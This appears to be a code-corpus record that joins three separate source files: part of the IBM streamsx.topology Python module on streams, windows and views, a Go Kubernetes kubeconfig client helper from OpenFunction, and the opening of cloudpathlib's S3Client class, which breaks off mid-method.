created by the instance of ``S`` in channel 0 are passed to the
instance of ``F`` in channel 0, and so on for channels 1 and 2.
Instances of callable transforms within a channel can use
the runtime functions
:py:func:`~streamsx.ec.channel`,
:py:func:`~streamsx.ec.local_channel`,
:py:func:`~streamsx.ec.max_channels` &
:py:func:`~streamsx.ec.local_max_channels`
to adapt to being invoked in parallel. For example a
source callable can use its channel number to determine
which partition to read from in a partitioned external system.
Calling ``set_parallel`` on a stream created by
:py:meth:`~Topology.subscribe` results in the stream
having `width` channels. Subscribe ensures that the
stream will contain all published tuples matching the
topic subscription and type. A published tuple will appear
on one of the channels though the specific channel is not known
in advance.
A parallel region is terminated by :py:meth:`end_parallel`
or :py:meth:`for_each`.
The number of channels is set by `width` which may be an `int` greater
than zero or a submission parameter created by
:py:meth:`Topology.create_submission_parameter`.
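For example, a sketch using a submission parameter for the width (the
parameter name ``channels`` and its default are illustrative; ``topo`` and
``S`` are as in the example above)::
    channels = topo.create_submission_parameter('channels', default=3)
    s = topo.source(S())
    s.set_parallel(channels)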
With IBM Streams 4.3 or later the number of channels can be
dynamically changed at runtime.
Parallel regions are started on non-source streams using
:py:meth:`parallel`.
Args:
width: The degree of parallelism for the parallel region.
name(str): Name of the parallel region. Defaults to the name of this stream.
Returns:
Stream: Returns this stream.
.. seealso:: :py:meth:`parallel`, :py:meth:`end_parallel`
.. versionadded:: 1.9
.. versionchanged:: 1.11 `name` parameter added.
"""
self.oport.operator.config['parallel'] = True
self.oport.operator.config['width'] = streamsx.topology.graph._as_spl_json(width, int)
if name:
name = self.topology.graph._requested_name(str(name), action='set_parallel')
self.oport.operator.config['regionName'] = name
return self
def set_consistent(self, consistent_config):
""" Indicates that the stream is the start of a consistent region.
Args:
consistent_config(consistent.ConsistentRegionConfig): the configuration of the consistent region.
Returns:
Stream: Returns this stream.
.. versionadded:: 1.11
"""
# add job control plane if needed
self.topology._add_job_control_plane()
self.oport.operator.consistent(consistent_config)
return self._make_placeable()
def last(self, size=1):
""" Declares a slding window containing most recent tuples
on this stream.
The number of tuples maintained in the window is defined by `size`.
If `size` is an `int` then it is the count of tuples in the window.
For example, with ``size=10`` the window always contains the
last (most recent) ten tuples.
If `size` is a `datetime.timedelta` then it is the duration
of the window. With a `timedelta` representing five minutes
then the window contains any tuples that arrived in the last
five minutes.
Args:
size: The size of the window, either an `int` to define the
number of tuples or `datetime.timedelta` to define the
duration of the window.
Examples::
# Create a window against stream s of the last 100 tuples
w = s.last(size=100)
::
# Create a window against stream s of tuples
# arrived on the stream in the last five minutes
w = s.last(size=datetime.timedelta(minutes=5))
Returns:
Window: Window of the last (most recent) tuples on this stream.
"""
win = Window(self, 'SLIDING')
if isinstance(size, datetime.timedelta):
win._evict_time(size)
elif isinstance(size, int):
win._evict_count(size)
else:
raise ValueError(size)
return win
def batch(self, size):
""" Declares a tumbling window to support batch processing
against this stream.
The number of tuples in the batch is defined by `size`.
If `size` is an ``int`` then it is the count of tuples in the batch.
For example, with ``size=10`` each batch will nominally
contain ten tuples. Thus processing against the returned
:py:class:`Window`, such as :py:meth:`~Window.aggregate` will be
executed every ten tuples against the last ten tuples on the stream.
For example the first three aggregations would be against
the first ten tuples on the stream, then the next ten tuples
and then the third set of ten tuples, and so on.
If `size` is a `datetime.timedelta` then it is the duration
of the batch using wallclock time.
With a `timedelta` representing five minutes
then the window contains any tuples that arrived in the last
five minutes. Thus processing against the returned :py:class:`Window`,
such as :py:meth:`~Window.aggregate` will be executed every five minutes
against the batch of tuples arriving in the last five minutes
on the stream. For example the first three aggregations would be
against any tuples on the stream in the first five minutes,
then the next five minutes and then minutes ten to fifteen.
A batch can contain no tuples if no tuples arrived on the stream
in the defined duration.
Each tuple on the stream appears only in a single batch.
The number of tuples seen by processing against the
returned window may be less than `size` (count or time based)
when:
* the stream is finite, the final batch may contain less tuples than the defined size,
* the stream is in a consistent region, drain processing will complete the current batch without waiting for the batch to reach its nominal size.
Examples::
# Create batches against stream s of 100 tuples each
w = s.batch(size=100)
::
# Create batches against stream s every five minutes
w = s.batch(size=datetime.timedelta(minutes=5))
Args:
size: The size of each batch, either an `int` to define the
number of tuples or `datetime.timedelta` to define the
duration of the batch.
Returns:
Window: Window allowing batch processing on this stream.
.. versionadded:: 1.11
"""
win = Window(self, 'TUMBLING')
if isinstance(size, datetime.timedelta):
win._evict_time(size)
elif isinstance(size, int):
win._evict_count(size)
else:
raise ValueError(size)
return win
def union(self, streamSet):
"""
Creates a stream that is a union of this stream and other streams
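A minimal sketch (assuming ``s1``, ``s2`` and ``s3`` are streams with the same schema)::
    merged = s1.union({s2, s3})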
Args:
streamSet: a set of Stream objects to merge with this stream
Returns:
Stream: A stream containing the tuples of this stream and of all streams in `streamSet`.
"""
if(not isinstance(streamSet,set)) :
raise TypeError("The union operator parameter must be a set object")
if(len(streamSet) == 0):
return self
op = self.topology.graph.addOperator("$Union$")
op.addInputPort(outputPort=self.oport)
for stream in streamSet:
op.addInputPort(outputPort=stream.oport)
oport = op.addOutputPort(schema=self.oport.schema)
return Stream(self.topology, oport)
def print(self, tag=None, name=None):
"""
Prints each tuple to stdout flushing after each tuple.
If `tag` is not `None` then each tuple has "tag: " prepended
to it before printing.
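A minimal sketch::
    s.print(tag='debug')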
Args:
tag: A tag to prepend to each tuple.
name(str): Name of the resulting stream.
When `None` defaults to a generated name.
Returns:
streamsx.topology.topology.Sink: Stream termination.
.. versionadded:: 1.6.1 `tag`, `name` parameters.
.. versionchanged:: 1.7
Now returns a :py:class:`Sink` instance.
"""
_name = name
if _name is None:
_name = 'print'
fn = streamsx.topology.functions.print_flush
if tag is not None:
tag = str(tag) + ': '
fn = lambda v : streamsx.topology.functions.print_flush(tag + str(v))
sp = self.for_each(fn, name=_name)
sp._op().sl = _SourceLocation(_source_info(), 'print')
return sp
def publish(self, topic, schema=None, name=None):
"""
Publish this stream on a topic for other Streams applications to subscribe to.
A Streams application may publish a stream to allow other
Streams applications to subscribe to it. A subscriber
matches a publisher if the topic and schema match.
By default a stream is published using its schema.
A stream of :py:const:`Python objects <streamsx.topology.schema.CommonSchema.Python>` can be subscribed to by other Streams Python applications.
If a stream is published setting `schema` to
``json`` or :py:const:`~streamsx.topology.schema.CommonSchema.Json`
then it is published as a stream of JSON objects.
Other Streams applications may subscribe to it regardless
of their implementation language.
If a stream is published setting `schema` to
``str`` or :py:const:`~streamsx.topology.schema.CommonSchema.String`
then it is published as strings.
Other Streams applications may subscribe to it regardless
of their implementation language.
Supported values of `schema` are only
``json``, :py:const:`~streamsx.topology.schema.CommonSchema.Json`
and
``str``, :py:const:`~streamsx.topology.schema.CommonSchema.String`.
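A minimal sketch publishing this stream as JSON (the topic name is
illustrative and ``CommonSchema`` is assumed to be imported from
:py:mod:`streamsx.topology.schema`)::
    s.publish('sensors/readings', schema=CommonSchema.Json)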
Args:
topic(str): Topic to publish this stream to.
schema: Schema to publish. Defaults to the schema of this stream.
name(str): Name of the publish operator, defaults to a generated name.
Returns:
streamsx.topology.topology.Sink: Stream termination.
.. versionadded:: 1.6.1 `name` parameter.
.. versionchanged:: 1.7
Now returns a :py:class:`Sink` instance.
"""
sl = _SourceLocation(_source_info(), 'publish')
_name = self.topology.graph._requested_name(name, action="publish")
schema = streamsx.topology.schema._normalize(schema)
group_id = None
if schema is not None and self.oport.schema.schema() != schema.schema():
nc = None
if schema == streamsx.topology.schema.CommonSchema.Json:
pub_stream = self.as_json()
elif schema == streamsx.topology.schema.CommonSchema.String:
pub_stream = self.as_string()
else:
raise ValueError(schema)
# See https://github.com/IBMStreams/streamsx.topology/issues/2161
# group_id = pub_stream._op()._layout_group('Publish', name if name else _name)
if self._placeable:
self._colocate(pub_stream, 'publish')
else:
pub_stream = self
# publish is never stateful
op = self.topology.graph.addOperator("com.ibm.streamsx.topology.topic::Publish", params={'topic': topic}, sl=sl, name=_name, stateful=False)
op.addInputPort(outputPort=pub_stream.oport)
op._layout_group('Publish', name if name else _name, group_id=group_id)
sink = Sink(op)
if pub_stream._placeable:
pub_stream._colocate(sink, 'publish')
return sink
def autonomous(self):
"""
Starts an autonomous region for downstream processing.
By default IBM Streams processing is executed in an autonomous region
where any checkpointing of operator state is autonomous (independent)
of other operators.
This method may be used to end a consistent region by starting an
autonomous region. This may be called even if this stream is in
an autonomous region.
Autonomous is not applicable when a topology is submitted
to a STANDALONE context and will be ignored.
.. versionadded:: 1.6
Returns:
Stream: Stream whose subsequent downstream processing is in an autonomous region.
"""
op = self.topology.graph.addOperator("$Autonomous$")
op.addInputPort(outputPort=self.oport)
oport = op.addOutputPort(schema=self.oport.schema)
return Stream(self.topology, oport, other=self)
def as_string(self, name=None):
"""
Declares a stream converting each tuple on this stream
into a string using `str(tuple)`.
The stream is typed as a :py:const:`string stream <streamsx.topology.schema.CommonSchema.String>`.
If this stream is already typed as a string stream then it will
be returned (with no additional processing against it and `name`
is ignored).
Args:
name(str): Name of the resulting stream.
When `None` defaults to a generated name.
.. versionadded:: 1.6
.. versionadded:: 1.6.1 `name` parameter added.
Returns:
Stream: Stream containing the string representations of tuples on this stream.
"""
sas = self._change_schema(streamsx.topology.schema.CommonSchema.String, 'as_string', name)._layout('AsString')
sas.oport.operator.sl = _SourceLocation(_source_info(), 'as_string')
return sas._add_hints(streamsx._streams._hints.STR_HINTS)
def as_json(self, force_object=True, name=None):
"""
Declares a stream converting each tuple on this stream into
a JSON value.
The stream is typed as a :py:const:`JSON stream <streamsx.topology.schema.CommonSchema.Json>`.
Each tuple must be supported by `JSONEncoder`.
If `force_object` is `True` then each tuple that is not a `dict`
will be converted to a JSON object with a single key `payload`
containing the tuple. Thus each object on the stream will
be a JSON object.
If `force_object` is `False` then each tuple is converted to
a JSON value directly using the `json` package.
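A minimal sketch (assuming each tuple is a plain number)::
    j = s.as_json()                     # 3 becomes {"payload": 3}
    j = s.as_json(force_object=False)   # 3 stays the JSON value 3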
If this stream is already typed as a JSON stream then it will
be returned (with no additional processing against it and
`force_object` and `name` are ignored).
Args:
force_object(bool): Force conversion of non dicts to JSON objects.
name(str): Name of the resulting stream.
When `None` defaults to a generated name.
.. versionadded:: 1.6.1
Returns:
Stream: Stream containing the JSON representations of tuples on this stream.
"""
force_dict = False
if isinstance(self.oport.schema, streamsx.topology.schema.StreamSchema):
func = None
if self.oport.schema.style != dict:
force_dict = True
else:
func = streamsx.topology.runtime._json_force_object if force_object else None
saj = self._change_schema(streamsx.topology.schema.CommonSchema.Json, 'as_json', name, func)._layout('AsJson')
saj.oport.operator.sl = _SourceLocation(_source_info(), 'as_json')
if force_dict:
saj.oport.operator.params['pyStyle'] = 'dict'
return saj
def _change_schema(self, schema, action, name=None, func=None):
"""Internal method to change a schema.
"""
if self.oport.schema.schema() == schema.schema():
return self
if func is None:
func = streamsx.topology.functions.identity
_name = name
if _name is None:
_name = action
css = self._map(func, schema, name=_name)
if self._placeable:
self._colocate(css, action)
return css
def _make_placeable(self):
self._placeable = True
return self
def _layout(self, kind=None, hidden=None, name=None, orig_name=None):
self._op()._layout(kind, hidden, name, orig_name)
return self
class View(object):
"""
The View class provides access to a continuously updated sampling of data items on a :py:class:`Stream` after submission.
A view object is produced by :py:meth:`~Stream.view`, and will access data items from the stream on which it is invoked.
For example, a `View` object could be created and used as follows:
>>> topology = Topology()
>>> rands = topology.source(lambda: iter(random.random, None))
>>> view = rands.view()
>>> submit(ContextTypes.DISTRIBUTED, topology)
>>> queue = view.start_data_fetch()
>>> for val in iter(queue.get, None):
... print(val)
...
0.6527
0.1963
0.0512
"""
def __init__(self, name):
self.name = name
self._view_object = None
self._submit_context = None
def _initialize_rest(self):
"""Used to initialize the View object on first use.
"""
if self._submit_context is None:
raise ValueError("View has not been created.")
job = self._submit_context._job_access()
self._view_object = job.get_views(name=self.name)[0]
def stop_data_fetch(self):
"""Terminates the background thread fetching stream data items.
"""
if self._view_object:
self._view_object.stop_data_fetch()
self._view_object = None
def start_data_fetch(self):
"""Starts a background thread which begins accessing data from the remote Stream.
The data items are placed asynchronously in a queue, which is returned from this method.
Returns:
queue.Queue: A Queue object which is populated with the data items of the stream.
"""
self._initialize_rest()
return self._view_object.start_data_fetch()
def fetch_tuples(self, max_tuples=20, timeout=None):
"""
Fetch a number of tuples from this view.
Fetching of data must have been started with
:py:meth:`start_data_fetch` before calling this method.
If ``timeout`` is ``None`` then the returned list will
contain ``max_tuples`` tuples. Otherwise if the timeout is reached
the list may contain less than ``max_tuples`` tuples.
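A minimal sketch::
    view.start_data_fetch()
    tuples = view.fetch_tuples(max_tuples=10, timeout=5.0)
    view.stop_data_fetch()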
Args:
max_tuples(int): Maximum number of tuples to fetch.
timeout(float): Maximum time to wait for ``max_tuples`` tuples.
Returns:
list: List of fetched tuples.
.. versionadded:: 1.12
"""
return self._view_object.fetch_tuples(max_tuples, timeout)
def display(self, duration=None, period=2):
"""Display a view within a Jupyter or IPython notebook.
Provides an easy mechanism to visualize data on a stream
using a view.
Tuples are fetched from the view and displayed in a table
within the notebook cell using a ``pandas.DataFrame``.
The table is continually updated with the latest tuples from the view.
This method calls :py:meth:`start_data_fetch` and will call
:py:meth:`stop_data_fetch` when completed if `duration` is set.
Args:
duration(float): Number of seconds to fetch and display tuples. If ``None`` then the display will be updated until :py:meth:`stop_data_fetch` is called.
period(float): Maximum update period.
.. note::
A view is a sampling of data on a stream so tuples that
are on the stream may not appear in the view.
.. note::
Python modules `ipywidgets` and `pandas` must be installed
in the notebook environment.
.. warning::
Behavior when called outside a notebook is undefined.
.. versionadded:: 1.12
"""
self._initialize_rest()
return self._view_object.display(duration, period)
class PendingStream(object):
"""Pending stream connection.
A pending stream is an initially `disconnected` stream. The `stream` attribute
can be used as an input stream when the required stream is not yet available. Once the required
stream is available the connection is made using :py:meth:`complete`.
The schema of the pending stream is defined by the stream passed into `complete`.
A simple example is creating a source stream after the filter that will use it::
# Create the pending or placeholder stream
pending_source = PendingStream(topology)
# Create a filter against the placeholder stream
f = pending_source.stream.filter(lambda t: t.startswith("H"))
source = topology.source(['Hello', 'World'])
# Now complete the connection
pending_source.complete(source)
Streams allows feedback loops in its flow graphs, where downstream processing can produce a stream that is
fed back into the input port of an upstream operator. Typically, feedback loops are
used to modify the state of upstream transformations, rather than repeat processing of tuples.
A feedback loop can be created by using a `PendingStream`. The upstream transformation or operator
that will end the feedback loop uses :py:attr:`~PendingStream.stream` as one of its inputs. A processing
pipeline is then created and once the downstream starting point of the feedback loop is available,
it is passed to :py:meth:`complete` to create the loop.
"""
def __init__(self, topology):
self.topology = topology
self._marker = topology.graph.addOperator(kind="$Pending$")
self._pending_schema = streamsx.topology.schema.StreamSchema(streamsx.topology.schema._SCHEMA_PENDING)
self.stream = Stream(topology, self._marker.addOutputPort(schema=self._pending_schema))
def complete(self, stream):
"""Complete the pending stream.
Any connections made to :py:attr:`stream` are connected to `stream` once
this method returns.
Args:
stream(Stream): Stream that completes the connection.
"""
assert not self.is_complete()
self._marker.addInputPort(outputPort=stream.oport)
self.stream.oport.schema = stream.oport.schema
# Update the pending schema to the actual schema
# Any downstream filters that took the reference
# will be automatically updated to the correct schema
self._pending_schema._set(self.stream.oport.schema)
# Mark the operator with the pending stream
# a start point for graph traversal
stream.oport.operator._start_op = True
def is_complete(self):
"""Has this connection been completed.
"""
return self._marker.inputPorts
class Window(object):
"""Declaration of a window of tuples on a `Stream`.
A `Window` enables transforms against a collection (or window)
of tuples on a stream rather than per-tuple transforms.
Windows are created against a stream using :py:meth:`Stream.batch`
or :py:meth:`Stream.last`.
Supported transforms are:
* :py:meth:`aggregate` - Aggregate the window contents into a single tuple.
A window is optionally :py:meth:`partitioned <partition>` to create
independent sub-windows per partition key.
A `Window` can be also passed as the input of an SPL
operator invocation to indicate the operator's
input port is windowed.
Example invoking the SPL `Aggregate` operator with a sliding window of
the last two minutes, triggering every five tuples::
win = s.last(datetime.timedelta(minutes=2)).trigger(5)
agg = op.Map('spl.relational::Aggregate', win,
schema = 'tuple<uint64 sum, uint64 max>')
agg.sum = agg.output('Sum(val)')
agg.max = agg.output('Max(val)')
"""
def __init__(self, stream, window_type):
self.topology = stream.topology
self._hints = stream._hints
self.stream = stream
self._config = {'type': window_type}
def _copy(self):
wc = Window(self.stream, None)
wc._config.update(self._config)
return wc
def _evict_count(self, size):
self._config['evictPolicy'] = 'COUNT'
self._config['evictConfig'] = size
def _evict_time(self, duration):
self._config['evictPolicy'] = 'TIME'
self._config['evictConfig'] = int(duration.total_seconds() * 1000.0)
self._config['evictTimeUnit'] = 'MILLISECONDS'
def _partition_by_attribute(self, attribute):
# We cannot always get the list of tuple attributes here
# because it might be a named type. Validation of the attribute
# will be done in code generation. We only support partition
# by attribute for StreamSchema (not CommonSchema).
# Our input schema is the output schema of the previous operator.
if not isinstance(self.stream.oport.schema, streamsx.topology.schema.StreamSchema):
raise ValueError("Partition by attribute is supported only for a structured schema")
self._config['partitioned'] = True
self._config['partitionBy'] = attribute
def _partition_by_callable(self, function):
dilled_callable = None
stateful = _determine_statefulness(function)
# This is based on graph._addOperatorFunction.
if isinstance(function, types.LambdaType) and function.__name__ == "<lambda>" :
function = streamsx.topology.runtime._Callable1(function, no_context=True)
elif function.__module__ == '__main__':
# Function/Class defined in main, create a callable wrapping its
# dill'ed form
function = streamsx.topology.runtime._Callable1(function,
no_context = True if inspect.isroutine(function) else None)
if inspect.isroutine(function):
# callable is a function
name = function.__name__
else:
# callable is a callable class instance
name = function.__class__.__name__
# dill format is binary; base64 encode so it is json serializable
dilled_callable = base64.b64encode(dill.dumps(function, recurse=None)).decode("ascii")
self._config['partitioned'] = True
if dilled_callable is not None:
self._config['partitionByCallable'] = dilled_callable
self._config['partitionByName'] = name
self._config['partitionByModule'] = function.__module__
self._config['partitionIsStateful'] = bool(stateful)
def partition(self, key):
"""Declare a window with this window's eviction and trigger policies, and a partition.
In a partitioned window, a subwindow will be created for each distinct
value received for the attribute used for partitioning. Each subwindow
is treated as if it were a separate window, and each subwindow shares
the same trigger and eviction policy.
The key may either be a string containing the name of an attribute,
or a python callable.
The `key` parameter may be a string only with a structured schema,
and the value of the `key` parameter must be the name of a single
attribute in the schema.
The `key` parameter may be a python callable object. If it is, the
callable is evaluated for each tuple, and the return from the callable
determines the partition into which the tuple is placed. The return
value must have a ``__hash__`` method. If checkpointing is enabled,
and the callable object has a state, the state of the callable object
will be saved and restored in checkpoints. However, ``__enter__`` and
``__exit__`` methods may not be called on the callable object.
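A minimal sketch (assuming dict-style tuples with an ``id`` attribute)::
    # partition by attribute name
    win = s.last(10).partition(key='id')
    # or partition by a callable
    win = s.last(10).partition(key=lambda t: t['id'] % 4)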
Args:
key: The name of the attribute to be used for partitioning, or
the python callable object used for partitioning.
Returns:
Window: Window that will be triggered.
.. versionadded:: 1.13
"""
pw = self._copy()
# Remove any existing partition. It will be replaced by the new
# partition
for k in {'partitioned','partitionBy','partitionByName','partitionByModule','partitionIsStateful'}:
pw._config.pop(k, None)
if callable(key):
pw._partition_by_callable(key)
else:
pw._partition_by_attribute(key)
return pw
def trigger(self, when=1):
"""Declare a window with this window's size and a trigger policy.
When the window is triggered is defined by `when`.
If `when` is an `int` then the window is triggered every
`when` tuples. For example, with ``when=5`` the window
will be triggered every five tuples.
If `when` is a `datetime.timedelta` then it is the period
of the trigger. With a `timedelta` representing one minute
then the window is triggered every minute.
By default, when `trigger` has not been called on a `Window`
it triggers for every tuple inserted into the window
(equivalent to ``when=1``).
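A minimal sketch::
    # trigger every ten tuples over a window of the last 100 tuples
    win = s.last(100).trigger(10)
    # trigger every 30 seconds
    win = s.last(100).trigger(datetime.timedelta(seconds=30))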
Args:
when: When the window is triggered, either an `int` to define the
number of tuples between triggers or a `datetime.timedelta` to define the
period of the trigger.
Returns:
Window: Window that will be triggered.
.. warning:: A trigger is only supported for a sliding window
such as one created by :py:meth:`last`.
"""
tw = self._copy()
if isinstance(when, datetime.timedelta):
tw._config['triggerPolicy'] = 'TIME'
tw._config['triggerConfig'] = int(when.total_seconds() * 1000.0)
tw._config['triggerTimeUnit'] = 'MILLISECONDS'
elif isinstance(when, int):
tw._config['triggerPolicy'] = 'COUNT'
tw._config['triggerConfig'] = when
else:
raise ValueError(when)
return tw
def aggregate(self, function, name=None):
"""Aggregates the contents of the window when the window is
triggered.
Upon a window trigger, the supplied function is passed a list containing
the contents of the window: ``function(items)``. The order of the window
items in the list are the order in which they were each received by the
window. If the function's return value is not `None` then the result will
be submitted as a tuple on the returned stream. If the return value is
`None` then no tuple submission will occur.
For example, a window that calculates a moving average of the
last 10 tuples could be written as follows::
win = s.last(10).trigger(1)
moving_averages = win.aggregate(lambda tuples: sum(tuples)/len(tuples))
When the window is :py:meth:`partitioned <partition>`
then each partition is triggered and aggregated using
`function` independently.
For example, this partitioned window aggregation will independently
call ``summarize_sensors`` with ten tuples all having the same `id`
when triggered. Each partition triggers independently so that
``summarize_sensors`` is invoked for a specific `id` every time
two tuples with that `id` have been inserted into the window partition::
win = s.last(10).trigger(2).partition(key='id')
moving_averages = win.aggregate(summarize_sensors)
.. note:: If a tumbling (:py:meth:`~Stream.batch`) window's stream
is finite then a final aggregation is performed if the
window is not empty. Thus ``function`` may be passed fewer tuples
for a window sized using a count. For example a stream with 105
tuples and a batch size of 25 tuples will perform four aggregations
with 25 tuples each and a final aggregation of 5 tuples.
Args:
function: The function which aggregates the contents of the window
name(str): The name of the returned stream. Defaults to a generated name.
Returns:
Stream: A `Stream` of the returned values of the supplied function.
.. warning::
In Python 3.5 or later if the stream being aggregated has a
structured schema that contains a ``blob`` type then any ``blob``
value will not be maintained in the window. Instead its
``memoryview`` object will have been released. If the ``blob``
value is required then perform a :py:meth:`map` transformation
(without setting ``schema``) copying any required
blob value in the tuple using ``memoryview.tobytes()``.
.. versionadded:: 1.8
.. versionchanged:: 1.11 Support for aggregation of streams with structured schemas.
.. versionchanged:: 1.13 Support for partitioned aggregation.
"""
hints = streamsx._streams._hints.check_aggregate(function, self)
schema = hints.schema if hints else streamsx.topology.schema.CommonSchema.Python
sl = _SourceLocation(_source_info(), "aggregate")
_name = self.topology.graph._requested_name(name, action="aggregate", func=function)
stateful = _determine_statefulness(function)
params = {}
# if _config contains 'partitionBy', add a parameter 'pyPartitionBy'
if 'partitionBy' in self._config:
params['pyPartitionBy'] = self._config['partitionBy']
if 'partitionByCallable' in self._config:
params['pyPartitionByCallable'] = self._config['partitionByCallable']
if 'partitionByName' in self._config:
params['pyPartitionByName'] = self._config['partitionByName']
params['pyPartitionByModule'] = self._config['partitionByModule']
params['pyPartitionIsStateful'] = self._config['partitionIsStateful']
params['toolkitDir'] = streamsx.topology.param.toolkit_dir()
op = self.topology.graph.addOperator(self.topology.opnamespace+"::Aggregate", function, name=_name, sl=sl, stateful=stateful, params=params)
op.addInputPort(outputPort=self.stream.oport, window_config=self._config)
streamsx.topology.schema.StreamSchema._fnop_style(self.stream.oport.schema, op, 'pyStyle')
oport = op.addOutputPort(schema=schema, name=_name)
op._layout(kind='Aggregate', name=op.runtime_id, orig_name=name)
return Stream(self.topology, oport)._make_placeable()._add_hints(hints)
class Sink(_placement._Placement, object):
"""
Termination of a `Stream`.
A :py:class:`Stream` is terminated by processing that typically
sends the tuples to an external system.
.. note:: A `Stream` may have multiple terminations.
.. seealso:: :py:meth:`~Stream.for_each`, :py:meth:`~Stream.publish`, :py:meth:`~Stream.print`
.. versionadded:: 1.7
"""
def __init__(self, op):
self.__op = op
def _op(self):
return self.__op
| [] | [] | [] | [] | [] | python | 0 | 0 |
pkg/cmd/util/client/client.go | package client
import (
"flag"
"fmt"
"os"
"path/filepath"
"strings"
"sync"
corebeta1 "github.com/openfunction/apis/core/v1beta1"
"k8s.io/cli-runtime/pkg/genericclioptions"
k8s "k8s.io/client-go/kubernetes"
scheme "k8s.io/client-go/kubernetes/scheme"
"k8s.io/client-go/rest"
"k8s.io/client-go/tools/clientcmd"
"k8s.io/client-go/util/homedir"
)
const (
kubeConfigDelimiter = ":"
)
// NewKubeConfigClient returns the kubeconfig and the client created from the kubeconfig.
func NewKubeConfigClient(cf *genericclioptions.ConfigFlags) (*rest.Config, *k8s.Clientset, error) {
config, err := cf.ToRESTConfig()
if err != nil {
return nil, nil, err
}
client, err := k8s.NewForConfig(config)
if err != nil {
return config, nil, err
}
return config, client, nil
}
func SetConfigDefaults(config *rest.Config) error {
gv := corebeta1.GroupVersion
config.GroupVersion = &gv
config.APIPath = "/apis"
config.NegotiatedSerializer = scheme.Codecs.WithoutConversion()
if config.UserAgent == "" {
config.UserAgent = rest.DefaultKubernetesUserAgent()
}
return nil
}
func getConfig() (*rest.Config, error) {
var (
doOnce sync.Once
kubeconfig *string
)
if home := homedir.HomeDir(); home != "" {
kubeconfig = flag.String("kubeconfig", filepath.Join(home, ".kube", "config"), "(optional) absolute path to the kubeconfig file")
} else {
kubeconfig = flag.String("kubeconfig", "", "absolute path to the kubeconfig file")
}
doOnce.Do(func() {
flag.Parse()
})
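// The KUBECONFIG environment variable, when set, takes precedence over the
// -kubeconfig flag. A value containing more than one colon-separated path is
// rejected; a single ':' is treated as part of the path when the flag already
// points at the same value.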
kubeConfigEnv := os.Getenv("KUBECONFIG")
delimiterBelongsToPath := strings.Count(*kubeconfig, kubeConfigDelimiter) == 1 && strings.EqualFold(*kubeconfig, kubeConfigEnv)
if len(kubeConfigEnv) != 0 && !delimiterBelongsToPath {
kubeConfigs := strings.Split(kubeConfigEnv, kubeConfigDelimiter)
if len(kubeConfigs) > 1 {
return nil, fmt.Errorf("multiple kubeconfigs in KUBECONFIG environment variable - %s", kubeConfigEnv)
}
kubeconfig = &kubeConfigs[0]
}
config, err := clientcmd.BuildConfigFromFlags("", *kubeconfig)
if err != nil {
return nil, err
}
return config, nil
}
| ["\"KUBECONFIG\""] | [] | ["KUBECONFIG"] | [] | ["KUBECONFIG"] | go | 1 | 0 |
cloudpathlib/s3/s3client.py | import os
from pathlib import Path, PurePosixPath
from typing import Any, Dict, Iterable, Optional, Union
from ..client import Client, register_client_class
from ..cloudpath import implementation_registry
from .s3path import S3Path
try:
from boto3.session import Session
from boto3.s3.transfer import TransferConfig
from botocore.config import Config
from botocore.exceptions import ClientError
import botocore.session
except ModuleNotFoundError:
implementation_registry["s3"].dependencies_loaded = False
@register_client_class("s3")
class S3Client(Client):
"""Client class for AWS S3 which handles authentication with AWS for [`S3Path`](../s3path/)
instances. See documentation for the [`__init__` method][cloudpathlib.s3.s3client.S3Client.__init__]
for detailed authentication options."""
def __init__(
self,
aws_access_key_id: Optional[str] = None,
aws_secret_access_key: Optional[str] = None,
aws_session_token: Optional[str] = None,
no_sign_request: Optional[bool] = False,
botocore_session: Optional["botocore.session.Session"] = None,
profile_name: Optional[str] = None,
boto3_session: Optional["Session"] = None,
local_cache_dir: Optional[Union[str, os.PathLike]] = None,
endpoint_url: Optional[str] = None,
boto3_transfer_config: Optional["TransferConfig"] = None,
):
"""Class constructor. Sets up a boto3 [`Session`](
https://boto3.amazonaws.com/v1/documentation/api/latest/reference/core/session.html).
Directly supports the same authentication interface, as well as the same environment
variables supported by boto3. See [boto3 Session documentation](
https://boto3.amazonaws.com/v1/documentation/api/latest/guide/session.html).
If no authentication arguments or environment variables are provided, then the client will
be instantiated as anonymous, which will only have access to public buckets.
Args:
aws_access_key_id (Optional[str]): AWS access key ID.
aws_secret_access_key (Optional[str]): AWS secret access key.
aws_session_token (Optional[str]): Session key for your AWS account. This is only
needed when you are using temporary credentials.
no_sign_request: (Optional[bool]): If `True`, credentials are not looked for and we use unsigned
requests to fetch resources. This will only allow access to public resources. This is equivalent
to `--no-sign-request` in the AWS CLI (https://docs.aws.amazon.com/cli/latest/reference/).
botocore_session (Optional[botocore.session.Session]): An already instantiated botocore
Session.
profile_name (Optional[str]): Profile name of a profile in a shared credentials file.
boto3_session (Optional[Session]): An already instantiated boto3 Session.
local_cache_dir (Optional[Union[str, os.PathLike]]): Path to directory to use as cache
for downloaded files. If None, will use a temporary directory.
endpoint_url (Optional[str]): S3 server endpoint URL to use for the constructed boto3 S3 resource and client.
Set it to access a custom deployment of an S3-compatible object store such as MinIO, Ceph or any other.
boto3_transfer_config (Optional[dict]): Instantiated TransferConfig for managing s3 transfers.
(https://boto3.amazonaws.com/v1/documentation/api/latest/reference/customizations/s3.html#boto3.s3.transfer.TransferConfig)
"""
endpoint_url = endpoint_url or os.getenv("AWS_ENDPOINT_URL")
if boto3_session is not None:
self.sess = boto3_session
else:
self.sess = Session(
aws_access_key_id=aws_access_key_id,
aws_secret_access_key=aws_secret_access_key,
aws_session_token=aws_session_token,
botocore_session=botocore_session,
profile_name=profile_name,
)
if no_sign_request:
self.s3 = self.sess.resource(
"s3",
endpoint_url=endpoint_url,
config=Config(signature_version=botocore.session.UNSIGNED),
)
self.client = self.sess.client(
"s3",
endpoint_url=endpoint_url,
config=Config(signature_version=botocore.session.UNSIGNED),
)
else:
self.s3 = self.sess.resource("s3", endpoint_url=endpoint_url)
self.client = self.sess.client("s3", endpoint_url=endpoint_url)
self.boto3_transfer_config = boto3_transfer_config
super().__init__(local_cache_dir=local_cache_dir)
def _get_metadata(self, cloud_path: S3Path) -> Dict[str, Any]:
data = self.s3.ObjectSummary(cloud_path.bucket, cloud_path.key).get()
return {
"last_modified": data["LastModified"],
"size": data["ContentLength"],
"etag": data["ETag"],
"mime": data["ContentType"],
"extra": data["Metadata"],
}
def _download_file(self, cloud_path: S3Path, local_path: Union[str, os.PathLike]) -> Path:
local_path = Path(local_path)
obj = self.s3.Object(cloud_path.bucket, cloud_path.key)
obj.download_file(str(local_path), Config=self.boto3_transfer_config)
return local_path
def _is_file_or_dir(self, cloud_path: S3Path) -> Optional[str]:
# short-circuit the root-level bucket
if not cloud_path.key:
return "dir"
# get first item by listing at least one key
